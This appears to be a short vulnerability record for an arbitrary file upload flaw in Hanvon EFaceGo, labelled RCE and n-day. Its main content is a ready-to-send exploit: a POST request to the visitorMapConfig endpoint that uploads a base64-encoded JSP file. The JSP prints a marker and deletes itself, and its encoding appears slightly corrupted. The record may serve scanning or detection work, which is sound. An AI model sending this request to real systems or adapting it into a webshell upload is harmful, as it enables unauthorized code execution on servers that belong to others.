vendor = "汉王"
name = "汉王EFaceGo updateVisitorMapConfig.do任意文件上传"
type = "RCE"
version = "未知"
path = "/manage/visitorMapConfig/updateVisitorMapConfig.do"
detail = "POST /manage/visitorMapConfig/updateVisitorMapConfig.do?recoToken=SGUsqvF7cVS HTTP/1.1 {\"id\":1,\"mapName\":\"25bdaf\",\"fileType\":\"jsp\",\"updatedPhoto\":\"PCUgb3V0LnByaW50bG4oInBib31qb,5yZmlwbXBsc3VrZGVjenVkc2VmeG15d2UiKTsgbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFN1cnZsZXBQYXRoKCkpKS5kZWxldGUoKTsgJT4\"}"
fix = "缺省规则可检出"
date = "0719"
label = "nday"
verifier = "AdySec"
